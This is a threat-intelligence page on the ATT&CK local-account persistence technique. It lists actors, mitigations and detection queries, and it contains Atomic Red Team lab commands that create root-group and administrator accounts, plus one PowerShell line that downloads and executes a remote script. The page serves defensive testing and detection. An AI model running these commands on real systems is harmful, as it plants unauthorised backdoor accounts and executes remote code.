Home/ATT&CK Technique/Local Account
ATT&CK Technique

Local Account

T1136.001 · persistence

Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. For example, with a sufficient level of access, the Windows net user /add command can be used to create a local account.

In Linux, the useradd command can be used, while on macOS systems, the dscl -create command can be used. Local accounts may also be added to network devices, often via common Network Device CLI commands such as username, to ESXi servers via esxcli system account add, or to Kubernetes clusters using the kubectl utility. Adversaries may also create new local accounts on network firewall management consoles - for example, by exploiting a vulnerable firewall management system, threat actors may be able to establish super-admin accounts that could be used to modify firewall rules and gain further access to the network.

Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

ContainersESXiLinuxmacOSNetwork DevicesWindows

Actors Using This

12
north_koreaAPT37
north_koreaAPT38
iranAPT39
chinaAPT3
chinaAPT41
russia_speaking_cybercrimeBianLian
north_koreaContagious Interview
russia_speaking_organized_cybercrimeDarkSide / BlackMatter
russiaDragonfly
chinaEarth Lusca
chinaAPT27
unknown_likely_russia_alignedFog Ransomware

Likely Attack Path

Techniques the same actors pair with this one distinctively - those showing up among actors who use this technique noticeably more than across all actors (lift > 1.15), grouped by kill-chain phase. The × is that lift multiplier; the shared-actor count is in the tooltip. A near-universal technique pairs with everything at baseline, so its list is short by design.
reconnaissance earlier
T1591 · Gather Victim Org Information ×4.67T1591.004 · Identify Roles ×4.58
resource-development earlier
T1588.003 · Code Signing Certificates ×5.95
persistence same
T1136.002 · Domain Account ×9.92
privilege-escalation later
T1546.008 · Accessibility Features ×9.92T1546.001 · Change Default File Association ×6.61T1546.011 · Application Shimming ×5.95T1546 · Event Triggered Execution ×4.58
credential-access later
T1552.002 · Credentials in Registry ×14.88T1003.008 · /etc/passwd and /etc/shadow ×6.10T1187 · Forced Authentication ×5.95T1003.002 · Security Account Manager ×4.35
collection later
T1213.003 · Code Repositories ×6.10
exfiltration later
T1048.002 · Exfiltration Over Asymmetric Encrypted Non-C2 Protocol ×6.61
other same
T1480.001 · Environmental Keying ×5.41

Atomic Tests

10
Executable Atomic Red Team test cases for exercising this technique in a lab. Copy a command, run it on the listed platform, confirm your detections fire.
bashelevatedlinuxCreate a user account on a Linux system
Create a user via useradd 
useradd -M -N -r -s /bin/bash -c evil_account #{username}
shelevatedlinuxCreate a user account on a FreeBSD system
Create a user via pw 
pw useradd #{username} -s /usr/sbin/nologin -d /nonexistent -c evil_account
bashelevatedmacosCreate a user account on a MacOS system
Creates a user on a MacOS system with dscl 
dscl . -create /Users/#{username}
dscl . -create /Users/#{username} UserShell /bin/zsh
dscl . -create /Users/#{username} RealName "#{realname}"
dscl . -create /Users/#{username} UniqueID "1010"
dscl . -create /Users/#{username} PrimaryGroupID 80
dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
command_promptelevatedwindowsCreate a new user in a command prompt
Creates a new user in a command prompt. Upon execution, "The command completed successfully." will be displayed. To verify the new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136.001_CMD" 
net user /add "#{username}" "#{password}"
powershellelevatedwindowsCreate a new user in PowerShell
Creates a new user in PowerShell. Upon execution, details about the new account will be displayed in the powershell session. To verify the new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136.001_PowerShell" 
New-LocalUser -Name "#{username}" -NoPassword
bashelevatedlinuxCreate a new user in Linux with `root` UID and GID.
Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign. 
useradd -g 0 -M -d /root -s /bin/bash #{username}
if [ $(cat /etc/os-release | grep -i 'Name="ubuntu"') ]; then echo "#{username}:#{password}" | sudo chpasswd; else echo "#{password}" | passwd --stdin #{username}; fi;
shelevatedlinuxCreate a new user in FreeBSD with `root` GID.
Creates a new user in FreeBSD and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign. 
pw useradd #{username} -g 0 -d /root -s /bin/sh
echo "#{password}" | pw usermod #{username} -h 0
command_promptelevatedwindowsCreate a new Windows admin user
Creates a new admin user in a command prompt. 
net user /add "#{username}" "#{password}"
net localgroup administrators "#{username}" /add
powershellelevatedwindowsCreate a new Windows admin user via .NET
Creates a new admin user in a powershell session without using net.exe 
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/0xv1n/dotnetfun/9b3b0d11d1c156909c0b1823cff3004f80b89b1f/Persistence/CreateNewLocalAdmin_ART.ps1')
bashcontainersCreate a Linux user via kubectl in a Pod
Launches a short-lived Alpine pod and creates a Linux user inside the pod. The pod is automatically deleted after execution. 
kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- sh -lc 'adduser -D #{username} && id #{username}'

Mitigations

2
MITRE ATT&CK mitigations - vendor-agnostic guidance for reducing exposure to this technique.
M1026Privileged Account Management

Privileged Account Management focuses on implementing policies, controls, and tools to securely manage privileged accounts (e.g., SYSTEM, root, or administrative accounts). This includes restricting access, limiting the scope of permissions, monitoring privileged account usage, and ensuring accountability through logging and auditing.

Account Permissions and Roles
  • Implement RBAC and least privilege principles to allocate permissions securely.
  • Use tools like Active Directory Group Policies to enforce access restrictions.
Credential Security
  • Deploy password vaulting tools like CyberArk, HashiCorp Vault, or KeePass for secure storage and rotation of credentials.
  • Enforce password policies for complexity, uniqueness, and expiration using tools like Microsoft Group Policy Objects (GPO).
Multi-Factor Authentication (MFA)
  • Enforce MFA for all privileged accounts using Duo Security, Okta, or Microsoft Azure AD MFA.
Privileged Access Management (PAM)
  • Use PAM solutions like CyberArk, BeyondTrust, or Thycotic to manage, monitor, and audit privileged access.
Auditing and Monitoring
  • Integrate activity monitoring into your SIEM (e.g., Splunk or QRadar) to detect and alert on anomalous privileged account usage.
Just-In-Time Access
  • Deploy JIT solutions like Azure Privileged Identity Management (PIM) or configure ephemeral roles in AWS and GCP to grant time-limited elevated permissions.
Tools for Implementation Privileged Access Management (PAM)
  • CyberArk, BeyondTrust, Thycotic, HashiCorp Vault.
Credential Management
  • Microsoft LAPS (Local Admin Password Solution), Password Safe, HashiCorp Vault, KeePass.
Multi-Factor Authentication
  • Duo Security, Okta, Microsoft Azure MFA, Google Authenticator.
Linux Privilege Management
  • sudo configuration, SELinux, AppArmor.
Just-In-Time Access
  • Azure Privileged Identity Management (PIM), AWS IAM Roles with session constraints, GCP Identity-Aware Proxy.
M1032Multi-factor Authentication

Multi-Factor Authentication (MFA) enhances security by requiring users to provide at least two forms of verification to prove their identity before granting access. These factors typically include: - Something you know: Passwords, PINs. - Something you have: Physical tokens, smartphone authenticator apps. - Something you are: Biometric data such as fingerprints, facial recognition, or retinal scans. Implementing MFA across all critical systems and services ensures robust protection against account takeover and unauthorized access.

Identity and Access Management (IAM)
  • Use IAM solutions like Azure Active Directory, Okta, or AWS IAM to enforce MFA policies for all user logins, especially for privileged roles.
  • Enable conditional access policies to enforce MFA for risky sign-ins (e.g., unfamiliar devices, geolocations).
  • Enable Conditional Access policies to only allow logins from trusted devices, such as those enrolled in Intune or joined via Hybrid/Entra.
Authentication Tools and Methods
  • Use authenticator applications such as Google Authenticator, Microsoft Authenticator, or Authy for time-based one-time passwords (TOTP).
  • Deploy hardware-based tokens like YubiKey, RSA SecurID, or smart cards for additional security.
  • Enforce biometric authentication for compatible devices and applications.
Secure Legacy Systems
  • Integrate MFA solutions with older systems using third-party tools like Duo Security or Thales SafeNet.
  • Enable RADIUS/NPS servers to facilitate MFA for VPNs, RDP, and other network logins.
Monitoring and Alerting
  • Use SIEM tools to monitor failed MFA attempts, login anomalies, or brute-force attempts against MFA systems.
  • Implement alerts for suspicious MFA activities, such as repeated failed codes or new device registrations.
Training and Policy Enforcement
  • Educate employees on the importance of MFA and secure authenticator usage.
  • Enforce policies that require MFA on all critical systems, especially for remote access, privileged accounts, and cloud applications.

Detection Coverage

2/6 layers
Coverage across standard detection surfaces. Rows marked none have no rule of that type mapped. Some are real blind spots worth closing; others are simply not applicable to this technique (e.g. YARA matches malware files, not network behaviour).
Behavioral / log (Sigma) 14
Analytics (MITRE CAR) 1
Runtime / container (Falco) none
File / malware (YARA) none
Network (Suricata/Snort) none
Vuln scan (Nuclei) none

CAR Analytics

1
MITRE Cyber Analytics Repository - field-tested detection logic for this technique, written as pseudocode/queries you adapt to your own SIEM (Splunk, Sentinel, EQL). Each is a ready starting point for a detection rule, not just a description.
CAR-2021-05-010Moderate coverageCreate local admin accounts using net exe

This search looks for the creation of local administrator accounts using net.exe.

Pseudocode - Pseudocode - CertUtil certificate extraction
processes = search Process:Create
certutil_downloads = filter processes where (
  (exe = C:\Windows\System32\net.exe OR exe = C:\Windows\System32\net1.exe ) AND (command_line = *localgroup* OR command_line = */add* OR command_line = *user* ))
output certutil_downloads
Splunk - Splunk code
| tstats count values(Processes.user) as user values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=net.exe OR Processes.process_name=net1.exe) AND (Processes.process=*localgroup* OR Processes.process=*/add* OR Processes.process=*user*) by Processes.process Processes.process_name Processes.dest   |`create_local_admin_accounts_using_net_exe_filter`

Comply & Defend

NIST 800-53AC-02, AC-03, AC-05, AC-06, AC-20, CM-05, CM-06, IA-02, IA-05, SI-04, SI-07
D3FEND8 defensive techniques
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
MITRE ATT&CKAtomic Red Teamcar (MITRE)
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin